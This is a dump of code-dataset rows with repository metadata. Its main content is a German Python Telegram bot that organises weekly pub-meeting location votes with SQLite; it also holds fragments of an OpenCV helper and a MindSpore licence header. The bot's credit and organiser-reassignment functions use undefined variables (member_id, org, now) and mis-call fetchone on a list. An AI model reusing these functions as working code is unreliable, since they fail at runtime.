cv2.destroyAllWindows()\n\n return img\n\n\ndef get_drawing_input(dst_rows, dst_cols, inp_rows=None, inp_cols=None, name=\"Input Drawing\", dtype=np.float32, low=-1, high=1, continue_keys=None):\n if inp_rows is None:\n inp_rows = dst_rows * 2\n if inp_cols is None:\n inp_cols = dst_cols * 2\n img = _get_pixel_input_raw(inp_rows, inp_cols, name, dtype, low, high, continue_keys)\n\n img = resize_image_to_info(img, dst_rows, dst_cols, low, high)\n return np.array(img[:, :]).reshape((9, 9, 1))\n\n\ndef show_image(mat, name=\"Image\", end_key=27, continue_keys=None):\n if continue_keys is None:\n continue_keys = __DEFAULT_CONTINUE_KEYS\n\n cv2.namedWindow(name, cv2.WINDOW_KEEPRATIO)\n cv2.imshow(name, mat)\n\n ret = False\n\n while True:\n k = wait_for_end_key(continue_keys)\n if k:\n if k == end_key:\n ret = True\n break\n cv2.destroyAllWindows()\n\n return ret\n\n\ndef wait_for_end_key(continue_keys):\n k = cv2.waitKey(20) & 0xFF\n return k if k in continue_keys else 0\n"},"avg_line_length":{"kind":"number","value":30.5972222222,"string":"30.597222"},"max_line_length":{"kind":"number","value":148,"string":"148"},"alphanum_fraction":{"kind":"number","value":0.6699954607,"string":"0.669995"}}},{"rowIdx":46353,"cells":{"hexsha":{"kind":"string","value":"d5c1194ffec6d10f95aba586977b20adfc1cbf7c"},"size":{"kind":"number","value":26507,"string":"26,507"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"DummerStammtischBot.py"},"max_stars_repo_name":{"kind":"string","value":"VVEIRD/DummerStammtischBot"},"max_stars_repo_head_hexsha":{"kind":"string","value":"da0fd2dfe354a7fda5790023d199ddd9c5fbf76c"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-08-11T18:50:04.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2021-08-11T18:50:04.000Z"},"max_issues_repo_path":{"kind":"string","value":"DummerStammtischBot.py"},"max_issues_repo_name":{"kind":"string","value":"VVEIRD/DummerStammtischBot"},"max_issues_repo_head_hexsha":{"kind":"string","value":"da0fd2dfe354a7fda5790023d199ddd9c5fbf76c"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":1,"string":"1"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2019-05-16T06:28:36.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2019-05-16T06:28:36.000Z"},"max_forks_repo_path":{"kind":"string","value":"DummerStammtischBot.py"},"max_forks_repo_name":{"kind":"string","value":"VVEIRD/DummerStammtischBot"},"max_forks_repo_head_hexsha":{"kind":"string","value":"da0fd2dfe354a7fda5790023d199ddd9c5fbf76c"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":1,"string":"1"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2019-05-14T14:02:58.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2019-05-14T14:02:58.000Z"},"content":{"kind":"string","value":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n## Stammtischbot\n#\n# Macht Mittwochs eine Umfrage um herauszufinden wohin es zum Stammtisch gehen soll\n\nimport sys\nimport json\nimport sqlite3\nfrom telegram.ext import Updater\nfrom telegram.ext import CommandHandler\nfrom telegram.ext import MessageHandler, Filters\nimport datetime, time\nimport os\nimport logging\nfrom threading import Thread\nimport sys\n\nos.environ['TZ'] = 'Europe/Berlin'\n\nTIME_ZONE_MOD=+2\n\nTOKEN = sys.argv[1]\n\nDEFAULT_STAMMTISCHTAG = 
3\n\nMAX_LOCATIONS = 30\n\nTAGE = {1 : \"Montag\", 2 : \"Dienstag\", 3 : \"Mittwoch\", 4 : \"Donnerstag\", 5 : \"Freitag\", 6 : \"Samstag\", 7 : \"Sonntag\"}\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n\nconn = sqlite3.connect('DummerStammtischBot.db')\n\nc = conn.cursor()\n\ndef add_column_if_not_exists(c, table_name, new_column, new_column_type):\n tab_exists=False\n \n for row in c.execute('SELECT name FROM sqlite_master WHERE type= ? AND name = ?', ['table', table_name]):\n tab_exists=True\n \n if tab_exists:\n columns = [i[1] for i in c.execute('PRAGMA table_info(' + str(table_name) + ')')]\n if new_column not in columns:\n c.execute('ALTER TABLE ' + str(table_name) + ' ADD COLUMN ' + str(new_column) + ' ' + str(new_column_type))\n\n\n# Create table\nc.execute('''CREATE TABLE IF NOT EXISTS chatrooms\n (chat_id INTEGER,\n stammtischtag INTEGER,\n last_notified INTEGER,\n last_voting_notification INTEGER,\n last_organizer INTEGER\n )''')\n\n# Add last_organizer for existing databases\nadd_column_if_not_exists(c, 'chatrooms', 'last_organizer', 'INTEGER')\n\nc.execute('''CREATE TABLE IF NOT EXISTS \"locations\" (\n \"chat_id\" INTEGER,\n \"l_id\" INTEGER,\n \"location\" TEXT UNIQUE,\n PRIMARY KEY(\"chat_id\",\"l_id\")\n)''')\n\nc.execute('''CREATE TABLE IF NOT EXISTS \"votings\" (\n \"chat_id\" INTEGER,\n \"member_id\" INTEGER,\n \"member_name\" TEXT,\n \"location_id\" INTEGER,\n PRIMARY KEY(\"chat_id\",\"member_id\")\n)''')\n\nc.execute('''CREATE TABLE IF NOT EXISTS \"voiced\" (\n \"chat_id\" INTEGER,\n \"member_id\" INTEGER,\n PRIMARY KEY(\"chat_id\",\"member_id\")\n)''')\n\nc.execute('''CREATE TABLE IF NOT EXISTS \"member_credits\" (\n \"chat_id\" INTEGER,\n \"member_id\" INTEGER,\n \"credits\" INTEGER,\n PRIMARY KEY(\"chat_id\",\"member_id\")\n)''')\n\n\n\n######\n## Liste mit den Locations fuer den Stammtisch\n######\n\ndef load_locations():\n conn = sqlite3.connect('DummerStammtischBot.db')\n c = 
conn.cursor()\n locations = {}\n print('Lade Locations...')\n print('-----------------------------------')\n for row in c.execute('SELECT chat_id, l_id, location FROM locations'):\n if row[0] not in locations:\n print ('Chat ID: %s' % (str(row[0])))\n print('-----------------------------------')\n locations[row[0]] = []\n locations[row[0]].append((row[1], row[2]))\n print(u'Location hinzugefuegt: ID: %d, %d' % (row[0], row[1]) )\n conn.close()\n return locations\n\n# Lade Locations wenn die Datei fuer locations existiert\n\nlocations = load_locations()\n\n\n# Wenn keine Location existiert, erzeuge eine leere Liste\n\nif locations == None:\n locations = {}\n\n\n######\n## Liste mit den Chats die der Bot angehoert\n######\n\ndef load_chatrooms():\n conn = sqlite3.connect('DummerStammtischBot.db')\n c = conn.cursor()\n chatrooms = {}\n for row in c.execute('SELECT chat_id, stammtischtag, last_notified, last_voting_notification, last_organizer FROM chatrooms'):\n chatrooms[row[0]] = [row[1],row[2], row[3], row[4]]\n conn.close()\n return chatrooms\n\n# Lade chatrooms wenn die Datei fuer chatrooms existiert\n\nchatrooms = load_chatrooms()\n\n# Wenn keine Location existiert, erzeuge eine leere Liste\n\nif chatrooms == None:\n chatrooms = {}\n\nconn.commit()\nconn.close()\n\n######\n## Methoden fuer den Chatbot\n######\n\n# Fuehrt ein Query aus, liefert keine Daten zurueck\ndef execute_query(query, args):\n conn = sqlite3.connect('DummerStammtischBot.db')\n c = conn.cursor()\n c.execute(query, args)\n conn.commit()\n conn.close()\n\n# Fuert ein Query aus, liefert das Resultat als 2D-Array zurueck\ndef execute_select(query, args):\n conn = sqlite3.connect('DummerStammtischBot.db')\n c = conn.cursor()\n result = []\n for row in c.execute(query, args):\n result.append(row)\n conn.close()\n return result\n\n# Fuegt einen neuen Gruppenchat hinzu, in dem der Bot hinzugefuegt wurde\ndef add_chatroom(chat_id):\n if chat_id not in chatrooms:\n chatrooms[chat_id] = 
[DEFAULT_STAMMTISCHTAG, 0, 0]\n print('New chatroom: ' + str(chat_id))\n execute_query('INSERT INTO chatrooms (chat_id, stammtischtag, last_notified, last_voting_notification) VALUES (?, ?, 0, 0)', [chat_id, chatrooms[chat_id][0]])\n\n# Entfernt alle Daten ueber einen Gruppenchat, asu dem der Bot entfernt wurde\ndef remove_chatroom(chat_id):\n if chat_id in chatrooms:\n print('Removed from Chat: ' + str(chat_id))\n chatrooms.pop(chat_id, None)\n locations.pop(chat_id, None)\n execute_query('DELETE FROM chatrooms WHERE chat_id = ?', [chat_id])\n execute_query('DELETE FROM votings WHERE chat_id = ?', [chat_id])\n execute_query('DELETE FROM locations WHERE chat_id = ?', [chat_id])\n print('Removed from chatroom: %s' % chat_id)\n\ndef start(update, context):\n add_chatroom(update.message.chat.id)\n context.bot.send_message(chat_id=update.message.chat_id, text=\"I'm a bot, please talk to me!\")\n\n# Prueft ob der User der Nachricht der Admin oder der Ersteller ist.\n# Bei beiden liefert er True zurueck\ndef has_admin(update, context):\n chat_id = update.message.chat.id\n user = context.bot.get_chat_member(update.message.chat.id, update.message.from_user.id)\n is_admin = 'administrator' == user.status\n is_creator = 'creator' == user.status\n return is_admin or is_creator\n\n# Prueft ob der aufrufende Benutzer von einem Admin voice erhalten hat\n# Falls ja, kann dieser User die erweiterten Funktionen des Bots nutzen\ndef has_voice(update, context):\n chat_id = update.message.chat.id\n user_id = update.message.from_user.id\n is_voiced = execute_select('SELECT 1 FROM voiced WHERE chat_id = ? AND member_id = ?', [chat_id, user_id])\n return len(is_voiced) > 0 \n\n# Erteilt einem Benutzer Voice. 
Darf nur von Admins ausgefuehrt werden.\ndef voice(update, context):\n chat_id = update.message.chat.id\n is_admin = has_admin(update, context)\n if not is_admin:\n update.message.reply_text(u'Nur Admins können diese Funktion benutzen')\n return\n for mention in update.message.entities:\n if mention.user is not None:\n user_id = mention.user.id\n user_name = mention.user.first_name\n execute_query('DELETE FROM voiced WHERE chat_id = ? AND member_id = ?', [chat_id, user_id])\n execute_query('INSERT INTO voiced (chat_id, member_id) VALUES (?, ?)', [chat_id, user_id])\n update.message.reply_text(u'%s wurde authorisiert' % (user_name))\n\n# Entzieht einem User voice. Darf nur von einem Admin gemacht werden\ndef revoke(update, context):\n chat_id = update.message.chat.id\n is_admin = has_admin(update, context)\n if not is_admin:\n update.message.reply_text(u'Nur Admins können diese Funktion benutzen')\n return\n for mention in update.message.entities:\n if mention.user is not None:\n user_id = mention.user.id\n user_name = mention.user.first_name\n execute_query('DELETE FROM voiced WHERE chat_id = ? AND member_id = ?', [chat_id, user_id])\n update.message.reply_text(u'%s kann die erweiterten Funktionen nicht mehr nutzen' % (user_name))\n\n# Fuegt einen ort zu den Stammtischen hinzu. 
Darf nut von Usern mit voice oder Admins gemacht werden\ndef add_location(update, context):\n global locations\n add_chatroom(update.message.chat.id)\n chat_id = update.message.chat.id\n location = ' '.join(context.args).strip()\n is_admin = has_admin(update, context)\n is_voiced = has_voice(update, context)\n if not is_admin and not is_voiced:\n update.message.reply_text(u'Du hast keine Berechtigung einen Ort hinzuzufügen, frage einen Admin ob er dich dazu berechtigt.')\n return\n if chat_id not in locations:\n locations[chat_id] = []\n if location and location not in locations[chat_id] and len(locations) <= MAX_LOCATIONS:\n execute_query('''INSERT INTO locations (chat_id, l_id, location) VALUES (?, Ifnull((SELECT max(l_id)+1 FROM locations WHERE chat_id = ?), 1), ?)''', (chat_id, chat_id, location))\n locations = load_locations()\n update.message.reply_text('Das Ziel ' + location + u' wurde hinzugefügt')\n elif len(locations) > MAX_LOCATIONS:\n update.message.reply_text('Ihr habt das Limit von %s Locations erreicht, sorry!')\n\n# Listet alle Orte, die für den Stammtisch verfügbar sind, auf.\ndef list_locations(update, context):\n message = u'Folgende Stammtischziele stehen zur Verfügung:\\r\\n'\n if update.message.chat.id in locations:\n i = 1\n for loc in locations[update.message.chat.id]:\n message = message + str(loc[0]) + '. ' + loc[1] + '\\r\\n'\n i += 1\n context.bot.send_message(chat_id=update.message.chat_id, text=message)\n else:\n context.bot.send_message(chat_id=update.message.chat_id, text=u'Es gibt noch keine Stammtischziele, füge welche mit /add hinzu')\n\n# Loescht einen Ort. 
Darf nut von Admins gemacht werden\ndef del_location(update, context):\n global locations\n add_chatroom(update.message.chat.id)\n chat_id = update.message.chat.id\n location_id = int(' '.join(context.args).strip())\n is_admin = has_admin(update, context)\n if not is_admin:\n update.message.reply_text(u'Du hast keine Berechtigung einen Ort zu löschen, frage einen Admin ob den Ort für dich löscht.')\n return\n if chat_id not in locations:\n locations[chat_id] = []\n loc_exist = False\n loc_name = ''\n for loc in locations[chat_id]:\n if loc[0] == location_id:\n loc_exist = True\n loc_name = loc[1]\n break\n if location_id and loc_exist:\n execute_query('''DELETE FROM locations WHERE chat_id = ? AND l_id = ?''', (chat_id, location_id))\n locations = load_locations()\n update.message.reply_text('Das Ziel ' + str(location_id) + '. ' + loc_name + u' wurde gelöscht')\n else:\n update.message.reply_text('Die Location existiert nicht (mehr)!')\n\n# Setzt den Tag des Stammtisches. Davon hängt ab wann abgestimmt wird. Duerfen nur Admins machen.\ndef set_stammtischtag(update, context):\n chat_id = update.message.chat.id\n from_user = context.bot.get_chat_member(update.message.chat.id, update.message.from_user.id)\n is_admin = has_admin(update, context)\n if not is_admin:\n update.message.reply_text(u'Du bist kein Admin, sorry!')\n return\n for arg in context.args:\n try:\n tag = int(arg)\n if chat_id in chatrooms and tag >= 1 and tag <= 7:\n chatrooms[chat_id] = tag\n execute_query('UPDATE chatrooms SET stammtischtag = ? 
WHERE chat_id = ?', [tag, chat_id])\n update.message.reply_text(u'Der Stammtischtag wurde auf %s gesetzt' % TAGE[tag])\n elif tag < 1 or tag > 7:\n update.message.reply_text(u'Erlaubte Werte sind 1 bis 7 für Mon bis Son')\n except ValueError:\n update.message.reply_text(u'Erlaubte Werte sind 1 bis 7 für Mon bis Son')\n\n\n# Event handler wenn der Bot einem Gruppenchat hinzugefuegt wird\ndef new_member(update, context):\n for member in update.message.new_chat_members:\n print(member)\n if member.username == 'DummerStammtischBot':\n add_chatroom(update.message.chat.id)\n context.bot.send_message(chat_id=update.message.chat_id, text=u'Hallo zusammen, ich bin eurem Chat beigetreten\\r\\nFolgende Befehl stehen euch zur Auswahl:\\r\\n /stammtischtag oder /st: Legt den Tag des Stammtischs fest\\r\\n /add: Ein Stammtischziel hinzufügen\\r\\n /list: Alle Stammtischziele anzeigen')\n else:\n update.message.reply_text(u'Hallo ' + member.username + ', willkommen am Stammtisch!')\n\n# Event handler wenn der Bot einem Gruppenchat entfernt wird\ndef left_member(update, context):\n member = update.message.left_chat_member\n print(member)\n if member.username == 'DummerStammtischBot':\n remove_chatroom(update.message.chat.id)\n\n\n# Zeigt alle verfuegbaren Funktionen an\ndef help(update, context):\n context.bot.send_message(chat_id=update.message.chat_id, text=u'''Ich bin der StammtischBot!\\r\\n\nFolgende Befhele stehen euch zur Auswahl:\n\n[Admins]\n /stammtischtag oder /st: Legt den Tag des Stammtischs fest\n /voice [1..x]: Der angegebene Benutzer kann die erweiterte Funktionen nutzen\n /revoke [1..x]: Entzieht den angegebenen Benutzern die Rechte auf die erweiterten funktionen.\n[Erweiterte Funktionen]\n /add: Ein Stammtischziel hinzufügen\n /del: Löscht einen Ort\n\n[Alle]\n /list: Alle Stammtischziele anzeigen\n /help: Diese Nachricht anzeigen\n /not_today: Der aktuelle Organisator kann die Orge eine Stunde nach der Entscheidung abgeben''')\n\n\n# Gibt aus, ob der Chat im 
Abstimmzeitraum befindet\ndef is_voting_time(chat_id, message_date):\n # Weekday of Message\n weekday = message_date.weekday()+1\n # Hour of message\n hour = message_date.hour+TIME_ZONE_MOD\n # Am Tag vor dem Stammtisch soll abgestimmt werden\n dayToNotifyAt = chatrooms[chat_id][0]-1\n # Zeitpunkt an dem das letztre Voting gestartet wurde\n lastNotified = chatrooms[chat_id][1]\n # Zeitpunkt an dem das letztre Voting beendet wurde\n lastVotingNotified = chatrooms[chat_id][2]\n # Wir wollen am Vortag zwischen 8 und 18 Uhr voten\n print('--------------------------------------------------')\n print('Check is voting time')\n print('--------------------------------------------------')\n print('Weekday: %d' % (weekday))\n print('Hour: %d' % (hour))\n print('Day to notify: %d' % (dayToNotifyAt))\n print('Last voting: %d' % (lastNotified))\n print('Last voting ended: %d' % (lastVotingNotified))\n print('Notify today: %s' % (str(dayToNotifyAt == weekday and hour >= 8 and hour < 18)))\n print('--------------------------------------------------')\n return dayToNotifyAt == weekday and hour >= 8 and hour < 18\n\n# Informiert den Chat ueber diverse Dinge\ndef notifier(context):\n for chat_id in chatrooms:\n now = int(time.time())\n weekday = datetime.datetime.today().weekday()+1\n hour = datetime.datetime.now().hour\n print('Hour: %s' % (hour))\n # Am Tag vor dem Stammtisch soll abgestimmt werden\n dayToNotifyAt = chatrooms[chat_id][0]-1\n # Zeitpunkt an dem das letztre Voting gestartet wurde\n lastNotified = chatrooms[chat_id][1]\n # Zeitpunkt an dem das letztre Voting beendet wurde\n lastVotingNotified = chatrooms[chat_id][2]\n # Wir wollen am Vortag installieren nur einmal pro Woche nach 8 Uhr\n if dayToNotifyAt == weekday and lastNotified+518400 < now and hour >= 8:\n print(\"Notifying %s\" % chat_id)\n execute_query('DELETE FROM votings WHERE chat_id = ?', [chat_id])\n message = u'Hallo, morgen ist wieder Stammtisch. 
Bitte voted bis heute um 18 Uhr, für ein Ziel.\\nWenn man voted muss man kommen, sonst gibts Haue!\\n\\n'\n if chat_id in locations:\n message += u'Folgende Stammtischziele stehen zur Verfügung:\\r\\n'\n for loc in locations[chat_id]:\n message += '%s. %s\\r\\n' % (loc[0],loc[1])\n message += u'\\nStimme mit 1 bis %s ab' % len(locations[chat_id])\n else:\n message += u'Leider gibt es noch keine Ziele. Füge welche mit /add hinzu'\n\n context.bot.send_message(chat_id=chat_id, text=message)\n execute_query('UPDATE chatrooms SET last_notified = ? WHERE chat_id = ?', [now, chat_id])\n chatrooms[chat_id][1] = now\n if dayToNotifyAt == weekday and lastVotingNotified+518400 < now and hour >= 18:\n last_organizer = chatrooms[chat_id][3]\n conn = sqlite3.connect('DummerStammtischBot.db')\n c = conn.cursor()\n message = 'Die Abstimmungszeit ist vorbei! Ihr habt wie folgt abgestimmt:\\n\\n'\n i = 1\n for row in c.execute('select (SELECT location FROm locations l WHERE l.l_id = v.location_id AND l.chat_id = v.chat_id) location, count(*) c FROM votings v WHERE chat_id = ? GROUP BY location_id ORDER BY c DESC', [chat_id]):\n message += '%s. %s (%s Stimmen)\\n' % (i, row[0], row[1])\n i += 1\n organisierer = c.execute('SELECT member_name, member_id FROM votings v WHERE chat_id = ? AND member_id IN (SELECT member_id FROM votings v2 WHERE chat_id = ? AND member_id IS NOT ? ORDER BY RANDOM() LIMIT 1)' , [chat_id, chat_id, last_organizer]).fetchone()\n message += '\\n%s darf diese Woche den Stammtisch organisieren' % organisierer[0]\n org_member_id = organisierer[1]\n context.bot.send_message(chat_id=chat_id, text=message)\n execute_query('UPDATE chatrooms SET last_voting_notification = ?, last_organizer = ? WHERE chat_id = ?', [now, org_member_id, chat_id])\n # If User was never organizer, they get 4 credits\n credits = execute_select('SELECT credits FROM member_credits WHERE chat_id = ? 
AND member_id = ?', [chat_id, member_id])\n if len(credits) == 0:\n execute_query('INSERT INTO member_credits(chat_id, member_id, credits) VALUES (?, ?, ?)', [chat_id, member_id, 4])\n # Add a credit to the member\n execute_query('UPDATE member_credits SET credits = credits+1 WHERE chat_id = ? AND member_id = ?', [chat_id, member_id])\n chatrooms[chat_id][2] = now\n chatrooms[chat_id][3] = org_member_id\n\n# Abstimmfunktion, der benutzer muss nur eine valide Zahl in den Chat eintippen, damit er abstimmt.\n# Er wird vom Bot informiert, wenn er abgestimmt hat.\ndef vote(update, context):\n print('------------------------------------')\n print ('Voting...')\n print('------------------------------------')\n chat_id = update.message.chat.id\n user_id = update.message.from_user.id\n user_name = update.message.from_user.first_name\n message_date = update.message.date\n print(u'%s hat mit %s abgestimmt' % (user_name, update.message.text))\n print('Is voting time: %s' % (str(is_voting_time(chat_id, message_date))))\n if chat_id in chatrooms and is_voting_time(chat_id, message_date):\n print ('Chatgroup is included')\n try:\n auswahl = int(update.message.text.strip())\n valid_selection = False\n for l in locations[chat_id]:\n if auswahl == l[0]:\n valid_selection = True\n if auswahl >= 1 and valid_selection:\n print('Auswahl ist vorhanden')\n execute_query('DELETE FROM votings WHERE chat_id = ? AND member_id = ?', [chat_id, user_id])\n execute_query('INSERT INTO votings (chat_id, member_id, member_name, location_id) VALUES (?, ?, ?, ?)', [chat_id, user_id, user_name, auswahl])\n location = execute_select('SELECT location FROM locations WHERE chat_id = ? 
AND l_id = ?', [chat_id, auswahl])[0]\n print('Location ist %s' % (location[0]))\n update.message.reply_text(u'%s hat für %s gestimmt' % (update.message.from_user.first_name, location[0]))\n except ValueError:\n a = 0\n print('------------------------------------')\n\n# Prueft ob der aufrufende Benutzer genug credits zum aufrufen der ot_today funktion hat\n# Falls ja, kann dieser User die erweiterten Funktionen des Bots nutzen\ndef has_enought_member_credits(update, context):\n chat_id = update.message.chat.id\n user_id = update.message.from_user.id\n credits = execute_select('SELECT credits FROM member_credits WHERE chat_id = ? AND member_id = ?', [chat_id, user_id])\n # If User was never organizer, they get 4 credits\n if len(credits) == 0:\n execute_query('INSERT INTO member_credits(chat_id, member_id, credits) VALUES (?, ?, ?)', [chat_id, member_id, 4])\n credits = execute_select('SELECT credits FROM member_credits WHERE chat_id = ? AND member_id = ?', [chat_id, user_id])\n credits = credits.fetchone()[0]\n enougth_credits = False\n if credits >= 3:\n enougth_credits = True\n execute_query('UPDATE member_credits SET credits = credits-3 WHERE chat_id = ? 
AND member_id = ?', [chat_id, member_id])\n return enougth_credits\n\n\n# Gibt aus, ob der /nottoday Befehl vom Organisator durchgeführt werden kann\ndef is_nottoday_time(chat_id, message_date):\n # Weekday of Message\n weekday = message_date.weekday()+1\n # Hour of message\n hour = message_date.hour\n # Am Tag vor dem Stammtisch soll abgestimmt werden\n dayToNotifyAt = chatrooms[chat_id][0]-1\n # Zeitpunkt an dem das letztre Voting gestartet wurde\n lastNotified = chatrooms[chat_id][1]\n # Zeitpunkt an dem das letztre Voting beendet wurde\n lastVotingNotified = chatrooms[chat_id][2]\n # Wir wollen am Vortag zwischen 8 und 18 Uhr voten\n return dayToNotifyAt == weekday and hour >= 18 and hour <= 19\n\n# Funktion wenn der Organisator heute NICHT organisieren will\ndef not_today(update, context):\n chat_id = update.message.chat.id\n user_id = update.message.from_user.id\n user_name = update.message.from_user.first_name\n message_date = update.message.date\n if chat_id in chatrooms and is_nottoday_time(chat_id, message_date) and user_id == chatrooms[chat_id][3]:\n if has_enought_member_credits(update, context):\n update.message.reply_text(u'%s möchte heute nicht den Stammtisch organisieren, es wird ein neuer Organisator gewählt.' % (update.message.from_user.first_name) )\n last_organizer = chatrooms[chat_id][3]\n conn = sqlite3.connect('DummerStammtischBot.db')\n c = conn.cursor()\n message = 'Die Abstimmungszeit ist vorbei! Ihr habt wie folgt abgestimmt:\\n\\n'\n i = 1\n for row in c.execute('select (SELECT location FROm locations l WHERE l.l_id = v.location_id AND l.chat_id = v.chat_id) location, count(*) c FROM votings v WHERE chat_id = ? GROUP BY location_id ORDER BY c DESC', [chat_id]):\n message += '%s. %s (%s Stimmen)\\n' % (i, row[0], row[1])\n i += 1\n organisierer = c.execute('SELECT member_name, member_id FROM votings v WHERE chat_id = ? AND member_id IN (SELECT member_id FROM votings v2 WHERE chat_id = ? AND member_id IS NOT ? 
ORDER BY RANDOM() LIMIT 1)' , [chat_id, chat_id, last_organizer]).fetchone()\n message += '\\n%s darf diese Woche den Stammtisch organisieren' % org[0]\n org_member_id = org[1]\n context.bot.send_message(chat_id=chat_id, text=message)\n execute_query('UPDATE chatrooms SET last_voting_notification = ?, last_organizer = ? WHERE chat_id = ?', [now, org_member_id, chat_id])\n # If User was never organizer, they get 4 credits\n credits = execute_select('SELECT credits FROM member_credits WHERE chat_id = ? AND member_id = ?', [chat_id, user_id])\n if len(credits) == 0:\n execute_query('INSERT INTO member_credits(chat_id, member_id, credits) VALUES (?, ?, ?)', [chat_id, member_id, 4])\n # Add a credit to the member\n execute_query('UPDATE member_credits SET credits = credits+1 WHERE chat_id = ? AND member_id = ?', [chat_id, member_id])\n chatrooms[chat_id][2] = now\n chatrooms[chat_id][3] = org_member_id\n else:\n update.message.reply_text(u'Du hast leider nicht genug Credits um die Organisation abzugeben!')\n elif chat_id in chatrooms and is_nottoday_time(chat_id, message_date):\n update.message.reply_text(u'Der Zeitraum die Organisation abzugeben ist leider schon vorbei!')\n elif chat_id in chatrooms and user_id != chatrooms[chat_id][3]:\n update.message.reply_text(u'Du Organisierst den Stammtisch heute gar nicht!')\n else:\n update.message.reply_text(u'Etwas ist schiefgegangen?!?!!?')\n\n######\n## Bot Stuff. 
Init, Mappen der handler/methoden\n######\n\nupdater = Updater(token=TOKEN, use_context=True)\ndispatcher = updater.dispatcher\njobqueue = updater.job_queue\n\nstart_handler = CommandHandler('start', start)\ndispatcher.add_handler(start_handler)\n\n# Job jede Minute\njob_minute = jobqueue.run_repeating(notifier, interval=600, first=20)\n\n# Fuegt eine Location zu den moeglichen Stammtischzielen hinzu\nadd_handler = CommandHandler('add', add_location)\ndispatcher.add_handler(add_handler)\n\n# Loescht eine Location\ndel_handler = CommandHandler('del', del_location)\ndispatcher.add_handler(del_handler)\n\n# Listet alle Stammtischzielen\nlist_handler = CommandHandler('list', list_locations)\ndispatcher.add_handler(list_handler)\n\n# Benutzer mehr Berechtigung geben\nvoice_handler = CommandHandler('voice', voice)\ndispatcher.add_handler(voice_handler)\n\n# Benutzer mehr Berechtigung geben\nrevoke_handler = CommandHandler('revoke', revoke)\ndispatcher.add_handler(revoke_handler)\n\n# Organisator gibt orga ab\nnot_today_handler = CommandHandler('not_today', not_today)\ndispatcher.add_handler(not_today_handler)\n\n# Setzt den Stammtischtag\nstammtischtag_handler = CommandHandler('stammtischtag', set_stammtischtag)\nst_handler = CommandHandler('st', set_stammtischtag)\ndispatcher.add_handler(stammtischtag_handler)\ndispatcher.add_handler(st_handler)\n\n# Hilfetext anzeigen\nhelp_handler = CommandHandler('help', help)\ndispatcher.add_handler(help_handler)\n\n# Eventhandler, wenn der Bot einem Chat hinzugefuegt wird\ndispatcher.add_handler(MessageHandler(Filters.status_update.new_chat_members, new_member))\n\n# Eventhandler, wenn der Bot aus einem Chat entfernt wird\ndispatcher.add_handler(MessageHandler(Filters.status_update.left_chat_member, left_member))\n\n# Echo handler\nvote_handler = MessageHandler(Filters.group, vote)\ndispatcher.add_handler(vote_handler)\n\nupdater.start_polling()\n\n# Allen chats sagen, dass der Bot Online ist\n#for chatid in chatrooms:\n# 
updater.bot.send_message(chat_id=int(chatid), text='Ich bin Online!')\n\nupdater.idle()\n"},"avg_line_length":{"kind":"number","value":44.3260869565,"string":"44.326087"},"max_line_length":{"kind":"number","value":312,"string":"312"},"alphanum_fraction":{"kind":"number","value":0.6740860905,"string":"0.674086"}}},{"rowIdx":46354,"cells":{"hexsha":{"kind":"string","value":"e66b64c090062fa4320308b0f75296dcc8e8c5a4"},"size":{"kind":"number","value":2436,"string":"2,436"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"official/cv/retinaface_resnet50/src/lr_schedule.py"},"max_stars_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_stars_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_stars_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_stars_count":{"kind":"number","value":77,"string":"77"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-10-15T08:32:37.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-03-30T13:09:11.000Z"},"max_issues_repo_path":{"kind":"string","value":"official/cv/retinaface_resnet50/src/lr_schedule.py"},"max_issues_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_issues_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_issues_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n 
\"Apache-2.0\"\n]"},"max_issues_count":{"kind":"number","value":3,"string":"3"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2021-10-30T14:44:57.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-02-14T06:57:57.000Z"},"max_forks_repo_path":{"kind":"string","value":"official/cv/retinaface_resnet50/src/lr_schedule.py"},"max_forks_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_forks_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_forks_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_forks_count":{"kind":"number","value":24,"string":"24"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2021-10-15T08:32:45.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-24T18:45:20.000Z"},"content":{"kind":"string","value":"# Copyright 2020 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the 